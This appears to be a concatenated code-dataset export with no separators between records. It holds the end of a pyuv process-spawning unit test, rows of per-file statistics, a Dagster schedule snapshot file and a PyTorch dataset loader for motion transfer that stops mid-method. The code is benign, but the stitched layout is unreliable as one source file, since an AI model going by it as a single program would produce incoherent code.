stdio = []
stdio.append(pyuv.StdIO(flags=pyuv.UV_IGNORE))
stdio.append(pyuv.StdIO(stream=stdout_pipe, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_WRITABLE_PIPE))
proc = pyuv.Process(loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", "proc_args_stdout.py", b"TEST"], exit_callback=proc_exit_cb, stdio=stdio)
else:
proc.spawn(file="./proc_args_stdout.py", args=["TEST"], exit_callback=proc_exit_cb, stdio=stdio)
stdout_pipe.start_read(stdout_read_cb)
loop.run()
self.assertEqual(self.exit_cb_called, 1)
self.assertEqual(self.close_cb_called, 2)
self.assertEqual(self.received_output, b"TEST")
def test_process_env(self):
self.exit_cb_called = 0
self.close_cb_called = 0
self.received_output = None
def handle_close_cb(handle):
self.close_cb_called +=1
def proc_exit_cb(proc, exit_status, term_signal):
self.assertEqual(exit_status, 0)
self.exit_cb_called += 1
proc.close(handle_close_cb)
def stdout_read_cb(handle, data, error):
self.received_output = data.strip()
handle.close(handle_close_cb)
loop = pyuv.Loop.default_loop()
stdout_pipe = pyuv.Pipe(loop)
stdio = []
stdio.append(pyuv.StdIO(flags=pyuv.UV_IGNORE))
stdio.append(pyuv.StdIO(stream=stdout_pipe, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_WRITABLE_PIPE))
proc = pyuv.Process(loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", "proc_env_stdout.py"], env={"TEST": "TEST"}, exit_callback=proc_exit_cb, stdio=stdio)
else:
proc.spawn(file="./proc_env_stdout.py", env={"TEST": "TEST"}, exit_callback=proc_exit_cb, stdio=stdio)
stdout_pipe.start_read(stdout_read_cb)
loop.run()
self.assertEqual(self.exit_cb_called, 1)
self.assertEqual(self.close_cb_called, 2)
self.assertEqual(self.received_output, b"TEST")
def test_process_stdin(self):
self.exit_cb_called = 0
self.close_cb_called = 0
self.received_output = None
self.exit_status = -1
self.term_signal = 0
def handle_close_cb(handle):
self.close_cb_called +=1
def proc_exit_cb(proc, exit_status, term_signal):
self.exit_cb_called += 1
self.exit_status = exit_status
self.term_signal = term_signal
proc.close(handle_close_cb)
def stdout_read_cb(handle, data, error):
if data:
self.received_output = data.strip()
handle.close(handle_close_cb)
def stdin_write_cb(handle, error):
handle.close(handle_close_cb)
loop = pyuv.Loop.default_loop()
stdin_pipe = pyuv.Pipe(loop)
stdout_pipe = pyuv.Pipe(loop)
stdio = []
stdio.append(pyuv.StdIO(stream=stdin_pipe, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_READABLE_PIPE))
stdio.append(pyuv.StdIO(stream=stdout_pipe, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_WRITABLE_PIPE))
proc = pyuv.Process(loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", "proc_stdin_stdout.py"], exit_callback=proc_exit_cb, stdio=stdio)
else:
proc.spawn(file="./proc_stdin_stdout.py", exit_callback=proc_exit_cb, stdio=stdio)
stdout_pipe.start_read(stdout_read_cb)
stdin_pipe.write(b"TEST"+common.linesep, stdin_write_cb)
loop.run()
self.assertEqual(self.exit_cb_called, 1)
self.assertEqual(self.close_cb_called, 3)
self.assertEqual(self.received_output, b"TEST")
def test_process_kill(self):
self.exit_cb_called = 0
self.close_cb_called = 0
self.exit_status = -1
self.term_signal = 0
def handle_close_cb(proc):
self.close_cb_called +=1
def proc_exit_cb(proc, exit_status, term_signal):
self.exit_cb_called += 1
self.exit_status = exit_status
self.term_signal = term_signal
proc.close(handle_close_cb)
def timer_cb(timer):
timer.close(handle_close_cb)
proc.kill(15)
loop = pyuv.Loop.default_loop()
timer = pyuv.Timer(loop)
timer.start(timer_cb, 0.1, 0)
proc = pyuv.Process(loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", "proc_infinite.py"], exit_callback=proc_exit_cb)
else:
proc.spawn(file="./proc_infinite.py", exit_callback=proc_exit_cb)
loop.run()
self.assertEqual(self.exit_cb_called, 1)
self.assertEqual(self.close_cb_called, 2)
if sys.platform == 'win32':
self.assertEqual(self.exit_status, 1)
else:
self.assertEqual(self.exit_status, 0)
self.assertEqual(self.term_signal, 15)
@platform_skip(["win32"])
def test_process_uid_gid(self):
self.exit_cb_called = 0
self.close_cb_called = 0
def proc_close_cb(proc):
self.close_cb_called +=1
def proc_exit_cb(proc, exit_status, term_signal):
self.assertEqual(exit_status, 0)
self.exit_cb_called += 1
proc.close(proc_close_cb)
if os.getuid() != 0:
self.skipTest("test disabled if running as non-root")
return
p_info = pwd.getpwnam("nobody")
loop = pyuv.Loop.default_loop()
proc = pyuv.Process(loop)
proc.spawn(file="./proc_basic.py", exit_callback=proc_exit_cb, uid=p_info.pw_uid, gid=p_info.pw_gid, flags=pyuv.UV_PROCESS_SETUID|pyuv.UV_PROCESS_SETGID)
pid = proc.pid
loop.run()
self.assertEqual(self.exit_cb_called, 1)
self.assertEqual(self.close_cb_called, 1)
self.assertNotEqual(pid, None)
@platform_skip(["win32"])
def test_process_uid_fail(self):
self.exit_cb_called = 0
self.close_cb_called = 0
def proc_close_cb(proc):
self.close_cb_called +=1
def proc_exit_cb(proc, exit_status, term_signal):
self.assertNotEqual(exit_status, 0)
self.exit_cb_called += 1
proc.close(proc_close_cb)
if os.getuid() != 0:
self.skipTest("test disabled if running as non-root")
return
loop = pyuv.Loop.default_loop()
proc = pyuv.Process(loop)
proc.spawn(file="./proc_basic.py", exit_callback=proc_exit_cb, uid=-42424242, flags=pyuv.UV_PROCESS_SETUID)
loop.run()
self.assertEqual(self.exit_cb_called, 1)
self.assertEqual(self.close_cb_called, 1)
def test_process_detached(self):
self.exit_cb_called = 0
def proc_exit_cb(proc, exit_status, term_signal):
self.exit_cb_called += 1
loop = pyuv.Loop.default_loop()
proc = pyuv.Process(loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", "proc_basic.py"], exit_callback=proc_exit_cb, flags=pyuv.UV_PROCESS_DETACHED)
else:
proc.spawn(file="./proc_basic.py", exit_callback=proc_exit_cb, flags=pyuv.UV_PROCESS_DETACHED)
proc.unref()
pid = proc.pid
loop.run()
self.assertEqual(self.exit_cb_called, 0)
proc.kill(0)
proc.kill(15)
self.assertNotEqual(pid, None)
if __name__ == '__main__':
unittest2.main(verbosity=2)
| 40.309353
| 161
| 0.627075
| 1,523
| 11,206
| 4.327643
| 0.069599
| 0.052799
| 0.043696
| 0.072827
| 0.898953
| 0.877864
| 0.874678
| 0.86436
| 0.853892
| 0.852981
| 0
| 0.014008
| 0.261021
| 11,206
| 277
| 162
| 40.454874
| 0.78191
| 0
| 0
| 0.769231
| 0
| 0
| 0.049714
| 0.003838
| 0
| 0
| 0
| 0
| 0.138462
| 1
| 0.134615
| false
| 0
| 0.026923
| 0
| 0.173077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bedda59ce9a7e5ef6a625b4b2e7b1ced216b91b7
| 6,705
|
py
|
Python
|
python_modules/dagster-graphql/dagster_graphql_tests/graphql/snapshots/snap_test_execute_schedule.py
|
joeyfreund/dagster
|
e551ff4bbb2c42b497a3e1c28cfb51fd5f2b1c21
|
[
"Apache-2.0"
] | 1
|
2020-12-20T18:39:17.000Z
|
2020-12-20T18:39:17.000Z
|
python_modules/dagster-graphql/dagster_graphql_tests/graphql/snapshots/snap_test_execute_schedule.py
|
joeyfreund/dagster
|
e551ff4bbb2c42b497a3e1c28cfb51fd5f2b1c21
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster-graphql/dagster_graphql_tests/graphql/snapshots/snap_test_execute_schedule.py
|
joeyfreund/dagster
|
e551ff4bbb2c42b497a3e1c28cfb51fd5f2b1c21
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# snapshottest: v1 - https://goo.gl/zC4yUc
from __future__ import unicode_literals
from snapshottest import Snapshot
snapshots = Snapshot()
snapshots[
'TestExecuteSchedule.test_tick_skip[sqlite_with_cli_api_run_launcher_in_process_env] 1'
] = {
'stats': {'ticksFailed': 0, 'ticksSkipped': 1, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [{'status': 'SKIPPED', 'tickId': '1'}],
'ticksCount': 1,
}
snapshots[
'TestExecuteSchedule.test_tick_success[sqlite_with_cli_api_run_launcher_in_process_env] 1'
] = {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 1},
'ticks': [{'status': 'SUCCESS', 'tickId': '1'}],
'ticksCount': 1,
}
snapshots[
'TestExecuteSchedule.test_should_execute_scheduler_error[sqlite_with_cli_api_run_launcher_in_process_env] 1'
] = {
'stats': {'ticksFailed': 1, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [{'status': 'FAILURE', 'tickId': '1'}],
'ticksCount': 1,
}
snapshots[
'TestExecuteSchedule.test_tags_scheduler_error[sqlite_with_cli_api_run_launcher_in_process_env] 1'
] = {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 1},
'ticks': [{'status': 'SUCCESS', 'tickId': '1'}],
'ticksCount': 1,
}
snapshots[
'TestExecuteSchedule.test_run_config_scheduler_error[sqlite_with_cli_api_run_launcher_in_process_env] 1'
] = {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 1},
'ticks': [{'status': 'SUCCESS', 'tickId': '1'}],
'ticksCount': 1,
}
snapshots[
'TestExecuteSchedule.test_query_multiple_schedule_ticks[sqlite_with_cli_api_run_launcher_in_process_env] 1'
] = [
{
'name': 'dynamic_config',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'run_config_error_schedule',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 1},
'ticks': [{'status': 'SUCCESS', 'tickId': '3'}],
'ticksCount': 1,
},
},
{
'name': 'invalid_config_schedule',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'no_config_pipeline_hourly_schedule',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 1},
'ticks': [{'status': 'SUCCESS', 'tickId': '1'}],
'ticksCount': 1,
},
},
{
'name': 'no_config_pipeline_hourly_schedule_with_config_fn',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'no_config_should_execute',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 1, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [{'status': 'SKIPPED', 'tickId': '2'}],
'ticksCount': 1,
},
},
{
'name': 'partition_based',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'partition_based_custom_selector',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'partition_based_decorator',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'partition_based_multi_mode_decorator',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'should_execute_error_schedule',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'solid_selection_daily_decorator',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'solid_selection_hourly_decorator',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'solid_selection_monthly_decorator',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'solid_selection_weekly_decorator',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'tagged_pipeline_override_schedule',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'tagged_pipeline_schedule',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'tags_error_schedule',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
]
snapshots[
'TestExecuteSchedule.test_invalid_config_schedule_error[sqlite_with_cli_api_run_launcher_in_process_env] 1'
] = {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 1},
'ticks': [{'status': 'SUCCESS', 'tickId': '1'}],
'ticksCount': 1,
}
| 32.707317
| 112
| 0.539299
| 564
| 6,705
| 6.170213
| 0.134752
| 0.110345
| 0.186207
| 0.191667
| 0.866667
| 0.862931
| 0.847414
| 0.807184
| 0.807184
| 0.807184
| 0
| 0.028737
| 0.278598
| 6,705
| 204
| 113
| 32.867647
| 0.690717
| 0.009247
| 0
| 0.507772
| 0
| 0
| 0.502711
| 0.170783
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.010363
| 0
| 0.010363
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8301a0d7c9d84d6f27427167df5c53b5615fe1f8
| 21,105
|
py
|
Python
|
DataSet.py
|
jlimsf/FewShotMotionTransfer
|
54fcef9d2c22d27bfea81a239b56d1a040205e86
|
[
"Apache-2.0"
] | null | null | null |
DataSet.py
|
jlimsf/FewShotMotionTransfer
|
54fcef9d2c22d27bfea81a239b56d1a040205e86
|
[
"Apache-2.0"
] | null | null | null |
DataSet.py
|
jlimsf/FewShotMotionTransfer
|
54fcef9d2c22d27bfea81a239b56d1a040205e86
|
[
"Apache-2.0"
] | null | null | null |
from torch.utils.data import dataset
import os
from PIL import Image
from torchvision.transforms import transforms
import torch
from torchvision.transforms import functional as F
import numpy as np
import glob
import random
import imageio
class BaseDataSet(dataset.Dataset):
def __init__(self, config):
super(BaseDataSet, self).__init__()
self.config = config
def loader(self, path, mode):
# with open(path, 'rb') as f:
img = Image.open(path)
return img.convert(mode)
def GetTexture(self, im, IUV):
U = IUV[:, :, 1]
V = IUV[:, :, 2]
Texture = np.zeros((24, 128, 128, 3), dtype=np.uint8)
for PartInd in range(1, 25):
tex = Texture[PartInd - 1, :, :, :].squeeze()
x, y = np.where(IUV[:, :, 0] == PartInd)
u = U[x, y] // 2
v = V[x, y] // 2
tex[u, v] = im[x, y]
Texture[PartInd - 1] = tex
TextureIm = np.zeros((128 * 4, 128 * 6, 3), dtype=np.uint8)
for i in range(len(Texture)):
x = i // 6 * 128
y = i % 6 * 128
TextureIm[x:x + 128, y:y + 128] = Texture[i]
return TextureIm
def label_to_tensor(self, label):
if isinstance(label, np.ndarray):
return torch.from_numpy(label)
else:
return (F.to_tensor(label)*255.0).type(torch.long)
def _transform(self, images, tolabel):
if 'resize' in self.config:
old_size, _ = images[0].size
size = [self.config['resize'], self.config['resize']]
resize = transforms.Resize(size, Image.NEAREST)
for i in range(len(images)):
images[i] = resize(images[i])
if 'hflip' in self.config and self.config['hflip']:
flip = random.randint(0, 1)
else:
flip = 0
if flip==1:
for i in range(len(images)):
images[i] = F.hflip(images[i])
for i in range(len(images)):
if tolabel[i]:
images[i] = self.label_to_tensor(images[i])
else:
images[i] = F.to_tensor(images[i])
return images
class ReconstructDataSet(BaseDataSet):
def __init__(self, root, config, list_name="image_list.txt"):
super(ReconstructDataSet, self).__init__(config)
self.root = root
self.folders = glob.glob(os.path.join(root, "*"))
self.folders.sort()
self.filelist = []
self.filelists = []
for i, folder in enumerate(self.folders):
with open(os.path.join(folder, list_name)) as f:
filelist = f.readlines()
filelist.sort(key=int)
filelist = [(x.strip(), i) for x in filelist]
self.filelist += filelist
self.filelists.append(filelist)
self.size = self.config['resize']
self.stage = self.config['phase']
def __len__(self):
return len(self.filelist)
def __getitem__(self, index):
label = self.filelist[index][1]
name = self.filelist[index][0]
folder = self.folders[label]
if self.stage == 'pretrain' or self.stage == 'train':
image = self.loader(os.path.join(folder, "image", name+".png"), mode="RGB")
body = self.loader(os.path.join(folder, "body", name+".png"), mode="L")
foreground = self.loader(os.path.join(folder, "segmentation", name+".png"), mode="L")
image_index = random.randrange(0, len(self.filelists[label]))
image_name = self.filelists[label][image_index][0]
class_image = self.loader(os.path.join(folder, "image", image_name+".png"), mode="RGB")
class_foreground = self.loader(os.path.join(folder, "segmentation", image_name+".png"), mode="L")
class_body = self.loader(os.path.join(folder, "body", image_name+".png"), mode="L")
IUV = self.loader(os.path.join(folder, "densepose", name+".png"), mode="RGB")
# transform_iuv = self._transform([IUV], [True] )[0]
# print (np.asarray(IUV).shape)
transform_output = self._transform([image, class_image, body, class_body, foreground, class_foreground, IUV],
[False, False, True, True, True, True, True])
data_name = ["image", "class_image", "body", "class_body", "foreground", "class_foreground", "IUV"]
data=dict(zip(data_name, transform_output))
# print (np.asarray(data["IUV"]).shape)
# print (self.stage)
data["mask"] = data["IUV"][-1,:,:]
data["foreground"] = (data["foreground"] > 0).to(torch.long)
data["U"] = data["IUV"][1,:,:].unsqueeze(0).to(torch.float32)/self.config["URange"]
data["V"] = data["IUV"][0,:,:].unsqueeze(0).to(torch.float32)/self.config["VRange"]
data.pop("IUV")
if self.stage == 'pretrain_texture':
data = {}
textures = []
texture = self.loader(os.path.join(folder, "texture", name + ".png"), mode="RGB")
texture_tensor = F.to_tensor(texture)
texture_size = texture_tensor.size()[1] // 4
texture_tensor = texture_tensor.view(-1, 4, texture_size, 6, texture_size)
texture_tensor = texture_tensor.permute(1, 3, 0, 2, 4)
texture_tensor = texture_tensor
texture_tensor = texture_tensor.contiguous().view(24 * 3, texture_size, texture_size)
textures.append(texture_tensor)
indexes = random.sample(list(range(0, len(self.filelists[label]))), self.config["num_texture"]-1)
for i in indexes:
name = self.filelists[label][i][0]
texture = self.loader(os.path.join(folder, "texture", name+".png"), mode="RGB")
texture_tensor = F.to_tensor(texture)
texture_size = texture_tensor.size()[1]//4
texture_tensor = texture_tensor.view(-1, 4, texture_size, 6, texture_size)
texture_tensor = texture_tensor.permute(1, 3, 0, 2, 4)
texture_tensor = texture_tensor.contiguous().view(24*3, texture_size, texture_size)
textures.append(texture_tensor)
data["texture"] = torch.stack(textures, dim=0)
if self.stage == 'train':
indexes = random.sample(list(range(0, len(self.filelists[label]))), 1)
for i in indexes:
name = self.filelists[label][i][0]
texture = self.loader(os.path.join(folder, "texture", name+".png"), mode="RGB")
texture_tensor = F.to_tensor(texture)
texture_size = texture_tensor.size()[1]//4
texture_tensor = texture_tensor.view(-1, 4, texture_size, 6, texture_size)
texture_tensor = texture_tensor.permute(1, 3, 0, 2, 4)
texture_tensor = texture_tensor.contiguous().view(24*3, texture_size, texture_size)
data["texture"] = texture_tensor.unsqueeze(0)
data["class"] = label
return data
class TransferDataSet(BaseDataSet):
def __init__(self, root, src_root, config, list_name="image_list.txt"):
super(TransferDataSet, self).__init__(config)
self.root = root
with open(os.path.join(root, list_name)) as f:
filelist = f.readlines()
filelist.sort(key=int)
filelist = [x.strip() for x in filelist]
self.filelist = filelist
self.src_root = src_root
with open(os.path.join(src_root, list_name)) as f:
filelist = f.readlines()
filelist.sort(key=int)
filelist = [x.strip() for x in filelist]
self.src_filelist = filelist
self.size = self.config['resize']
self.stage = self.config['phase']
def __len__(self):
return len(self.filelist)
def loader(self, path, mode):
with open(path, 'rb') as f:
img = Image.open(f)
return img.convert(mode)
def label_to_tensor(self, label):
if isinstance(label, np.ndarray):
return torch.from_numpy(label)
else:
return (F.to_tensor(label) * 255.0).type(torch.long)
def _transform(self, images, tolabel):
if 'resize' in self.config:
old_size, _ = images[0].size
size = [self.config['resize'], self.config['resize']]
resize = transforms.Resize(size, Image.NEAREST)
for i in range(len(images)):
images[i] = resize(images[i])
if 'hflip' in self.config and self.config['hflip']:
flip = random.randint(0, 1)
else:
flip = 0
if flip == 1:
for i in range(len(images)):
images[i] = F.hflip(images[i])
for i in range(len(images)):
if tolabel[i]:
images[i] = self.label_to_tensor(images[i])
else:
images[i] = F.to_tensor(images[i])
return images
def __getitem__(self, index):
name = self.filelist[index]
root = self.root
src_root = self.src_root
image = self.loader(os.path.join(root, "image", name + ".png"), mode="RGB")
body = self.loader(os.path.join(root, "body", name + ".png"), mode="L")
foreground = self.loader(os.path.join(root, "segmentation", name + ".png"), mode="L")
class_image = self.loader(os.path.join(src_root, "image", self.src_filelist[0] + ".png"), mode="RGB")
class_foreground = self.loader(os.path.join(src_root, "segmentation", self.src_filelist[0] + ".png"), mode="L")
class_body = self.loader(os.path.join(src_root, "body", self.src_filelist[0] + ".png"), mode="L")
transform_output = self._transform([image, class_image, body, class_body, foreground, class_foreground], [False, False, True, True, True, True])
data_name = ["image", "class_image", "body", "class_body", "foreground", "class_foreground"]
data = dict(zip(data_name, transform_output))
data["foreground"] = (data["foreground"] > 0).to(torch.long)
textures = []
indexes = random.sample(list(range(0, len(self.src_filelist))), self.config["num_texture"])
for i in indexes:
name = self.src_filelist[i]
texture = self.loader(os.path.join(src_root, "texture", name + ".png"), mode="RGB")
texture_tensor = F.to_tensor(texture)
texture_size = texture_tensor.size()[1] // 4
texture_tensor = texture_tensor.view(-1, 4, texture_size, 6, texture_size)
texture_tensor = texture_tensor.permute(1, 3, 0, 2, 4)
texture_tensor = texture_tensor
texture_tensor = texture_tensor.contiguous().view(24 * 3, texture_size, texture_size)
textures.append(texture_tensor)
data["texture"] = torch.stack(textures, dim=0)
data["class"] = 0
return data
class RT_ReconstructDataSet(BaseDataSet):
def __init__(self, root, config, min_sequence_len, list_name="image_list.txt"):
super(RT_ReconstructDataSet, self).__init__(config)
self.root = root
# self.folders = glob.glob(os.path.join(root, "*"))
self.folders = []
for video in os.listdir(self.root):
video_dir = os.path.join(self.root, video)
for subject in os.listdir(video_dir):
subject_dir = os.path.join(video_dir, subject)
with open(os.path.join(subject_dir, list_name)) as f:
filelist = f.readlines()
if len(filelist) < min_sequence_len:
continue
else:
self.folders.append(subject_dir)
self.filelist = []
self.filelists = []
for i, folder in enumerate(self.folders):
with open(os.path.join(folder, list_name)) as f:
filelist = f.readlines()
# filelist.sort(key=int)
filelist = [(x.strip(), i) for x in filelist]
self.filelist += filelist
self.filelists.append(filelist)
self.size = self.config['resize']
self.stage = self.config['phase']
def __len__(self):
return len(self.filelist)
def __getitem__(self, index):
label = self.filelist[index][1]
name = self.filelist[index][0]
folder = self.folders[label]
if self.stage == 'pretrain' or self.stage == 'train':
image = self.loader(os.path.join(folder, "image", name+".jpg"), mode="RGB")
body = self.loader(os.path.join(folder, "body", name+".png"), mode="L")
foreground = self.loader(os.path.join(folder, "segmentation", name+".jpg"), mode="L")
image_index = random.randrange(0, len(self.filelists[label]))
image_name = self.filelists[label][image_index][0]
class_image = self.loader(os.path.join(folder, "image", image_name+".jpg"), mode="RGB")
class_foreground = self.loader(os.path.join(folder, "segmentation", image_name+".jpg"), mode="L")
class_body = self.loader(os.path.join(folder, "body", image_name+".png"), mode="L")
IUV = self.loader(os.path.join(folder, "densepose", name+".png") , mode="RGB")
# IUV = imageio.imread(iuv_p)
#
# print (np.asarray(IUV).shape)
# print (np.unique(np.asarray(IUV)))
# print (np.unique(np.asarray(IUV)[:, :, 0]))
# print (np.unique(np.asarray(IUV)[:, :, 1]))
# print (np.unique(np.asarray(IUV)[:, :, 2]))
# transform_iuv = self._transform([IUV], [True] )[0]
# print (transform_iuv.shape)
# print (np.unique(transform_iuv[0, :, :]))
# print (np.unique(transform_iuv[1, :, :]))
# print (np.unique(transform_iuv[2, :, :]))
#
# exit()
transform_output = self._transform([image, class_image, body, class_body, foreground, class_foreground, IUV], [False, False, True, True, True, True, True])
data_name = ["image", "class_image", "body", "class_body", "foreground", "class_foreground", "IUV"]
data=dict(zip(data_name, transform_output))
data["mask"] = data["IUV"][-1,:,:]
# print (np.unique(data['mask'], return_counts=True), ' unique mask')
# print (data["IUV"][-1, :, :].shape)
data["foreground"] = (data["foreground"] > 0).to(torch.long)
data["U"] = data["IUV"][1,:,:].unsqueeze(0).to(torch.float32)/self.config["URange"]
data["V"] = data["IUV"][0,:,:].unsqueeze(0).to(torch.float32)/self.config["VRange"]
data.pop("IUV")
# print (np.unique(data['mask']), ' unique mask')
# exit()
if self.stage == 'pretrain_texture':
data = {}
textures = []
texture = self.loader(os.path.join(folder, "texture", name + ".png"), mode="RGB")
texture_tensor = F.to_tensor(texture)
texture_size = texture_tensor.size()[1] // 4
texture_tensor = texture_tensor.view(-1, 4, texture_size, 6, texture_size)
texture_tensor = texture_tensor.permute(1, 3, 0, 2, 4)
texture_tensor = texture_tensor
texture_tensor = texture_tensor.contiguous().view(24 * 3, texture_size, texture_size)
textures.append(texture_tensor)
indexes = random.sample(list(range(0, len(self.filelists[label]))), self.config["num_texture"]-1)
for i in indexes:
name = self.filelists[label][i][0]
texture = self.loader(os.path.join(folder, "texture", name+".png"), mode="RGB")
texture_tensor = F.to_tensor(texture)
texture_size = texture_tensor.size()[1]//4
texture_tensor = texture_tensor.view(-1, 4, texture_size, 6, texture_size)
texture_tensor = texture_tensor.permute(1, 3, 0, 2, 4)
texture_tensor = texture_tensor.contiguous().view(24*3, texture_size, texture_size)
textures.append(texture_tensor)
data["texture"] = torch.stack(textures, dim=0)
if self.stage == 'train':
indexes = random.sample(list(range(0, len(self.filelists[label]))), 1)
for i in indexes:
name = self.filelists[label][i][0]
texture = self.loader(os.path.join(folder, "texture", name+".png"), mode="RGB")
texture_tensor = F.to_tensor(texture)
texture_size = texture_tensor.size()[1]//4
texture_tensor = texture_tensor.view(-1, 4, texture_size, 6, texture_size)
texture_tensor = texture_tensor.permute(1, 3, 0, 2, 4)
texture_tensor = texture_tensor.contiguous().view(24*3, texture_size, texture_size)
data["texture"] = texture_tensor.unsqueeze(0)
data["class"] = label
return data
class ValidationTransferDataSet(BaseDataSet):
def __init__(self, root, src_root, config, list_name="image_list.txt"):
super(ValidationTransferDataSet, self).__init__(config)
self.root = root
self.src_root = src_root
with open(os.path.join(root, list_name)) as f:
filelist = f.readlines()
filelist.sort(key=int)
filelist = [x.strip() for x in filelist]
self.filelist = filelist
with open(os.path.join(src_root, list_name)) as f:
filelist = f.readlines()
filelist = [x.strip() for x in filelist]
self.src_filelist = filelist
self.size = self.config['resize']
self.stage = self.config['phase']
def __len__(self):
return len(self.filelist)
def loader(self, path, mode):
with open(path, 'rb') as f:
img = Image.open(f)
return img.convert(mode)
def label_to_tensor(self, label):
if isinstance(label, np.ndarray):
return torch.from_numpy(label)
else:
return (F.to_tensor(label) * 255.0).type(torch.long)
def _transform(self, images, tolabel):
if 'resize' in self.config:
old_size, _ = images[0].size
size = [self.config['resize'], self.config['resize']]
resize = transforms.Resize(size, Image.NEAREST)
for i in range(len(images)):
images[i] = resize(images[i])
for i in range(len(images)):
if tolabel[i]:
images[i] = self.label_to_tensor(images[i])
else:
images[i] = F.to_tensor(images[i])
return images
def __getitem__(self, index):
name = self.filelist[index]
root = self.root
src_root = self.src_root
image = self.loader(os.path.join(root, "image", name + ".png"), mode="RGB")
# print (image)
body = self.loader(os.path.join(root, "body", name + ".png"), mode="L")
# print (body)
foreground = self.loader(os.path.join(root, "segmentation", name + ".png"), mode="L")
# print (foreground)
class_image = self.loader(os.path.join(src_root, "image", self.src_filelist[0] + ".jpg"), mode="RGB")
# print (class_image)
class_foreground = self.loader(os.path.join(src_root, "segmentation", self.src_filelist[0] + ".jpg"), mode="L")
# print (class_foreground)
class_body = self.loader(os.path.join(src_root, "body", self.src_filelist[0] + ".png"), mode="L")
# print (class_body)
transform_output = self._transform([image, class_image, body, class_body, foreground, class_foreground], [False, False, True, True, True, True])
# print (transform_output)
data_name = ["image", "class_image", "body", "class_body", "foreground", "class_foreground"]
data = dict(zip(data_name, transform_output))
